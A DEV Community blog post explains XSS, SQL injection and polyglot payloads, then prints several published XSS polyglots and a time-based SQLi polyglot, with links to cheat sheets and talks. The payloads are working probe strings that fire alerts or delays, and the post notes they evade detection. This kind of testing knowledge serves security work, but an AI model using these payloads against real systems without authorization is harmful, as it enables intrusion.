DEV Community

Cover image for XSS and SQLi Polyglot Payloads
R̶E̶D̶A̶C̶T̶E̶D̶
R̶E̶D̶A̶C̶T̶E̶D̶

Posted on

XSS and SQLi Polyglot Payloads

Alt Text

What is 'XSS'?
Cross-site scripting (XSS) is a type of code-injection vulnerability found typically in web applications. XSS allows attackers to 'inject' client-side scripts into pages that will be processed and delivered to other users for viewing. XSS is often used to bypass access controls such as the same-origin policy. Attackers using XSS usually leverage known vulnerabilities in web applications, their servers, or the plug-in systems the web app needs for functionality. An attacker utilizing XSS will introduce malicious code into the content being delivered. When the combined content arrives to another user it is delivered from a trusted source. With XSS an attacker can gain elevated access-privileges to sensitive data, session cookies, and whatever other information that is maintained by the browser and will be delivered to the user.

What is 'SQLi'?
SQLi are SQL injections. They are code injection techniques like XSS, used to attack what are known to be or suspected to be data-driven applications. They are SQL statements formed with the intent of dumping database contents to the attacker. SQL injections can allow attackers to spoof identity, tamper with data, cause repudiation issues like voiding transactions or changing balances, disclose all of the system's data, destroy the data, or even become administrators of the database server. The first public discussions of SQL injection appeared around 1998 in Phrack Magazine.

What are 'polyglot payloads'?
Basically they are pieces of code that can be executed in multiple contexts in an application and still be treated as valid data. They are useful because with them you can test the application's input controls quicker and with less of a chance of being noticed. There are XSS, SQLi, and file (SWF, PDF, etc) polyglots. In complex applications the user input travels through many checkpoints. The route the input takes may be from the URL through a filter, into a database, and back out to a decoder before it is ever displayed for the user to see. The chart below illustrates what this input-route might look like.

Alt Text

XSS polyglot payload by Rsnake:
‘;alert(String.fromCharCode(88,83,83))//‘;alert(String.fromCharCode(88,83,83))//“;alert(String.fromCharCode(88,83,83))//“;alert(String.fromCharCode(88,83,83))//—></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

An XSS polyglot payload by Ashar Javed from his XSS PhD research:
‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’—>”></script><script>alert(1)</script>”><img/id=“confirm&lpar;1)”/alt=“/“src=“/“onerror=eval(id&%23x29;>’”><img src=“http://i.imgur.com/P8mL8.jpg”>

XSS polyglot payload by Mathias Karlsson:
“onclick=alert(1)//<button‘onclick=alert(1)//>*/alert(1)//

An SQLi polyglot payload by Mathias Karlsson:
SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/
The above polyglot payload works in single quote context, double quote context, as well as "straight into query" context. Please take the time to view Mathias Karlsson's slideshare below titled 'Polyglot Payloads in Practice'. There are some interesting attack patterns in it. It's also where the ASCII devil came from.

Mirror of RSnake's XSS Cheatsheet:
https://www.in-secure.org/misc/xss/xss.html

DEF CON 23 - Jason Haddix - How to Shot Web: Web and mobile hacking in 2015:
https://www.youtube.com/watch?v=-FAjxUOKbdI

Polyglot Payloads in Practice by Mathias Karlsson:
https://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra

Phrack Magazine:
http://www.phrack.org

If any of this is interesting to you please stay tuned. Next up is Cross-Site Request Forgery.

Top comments (0)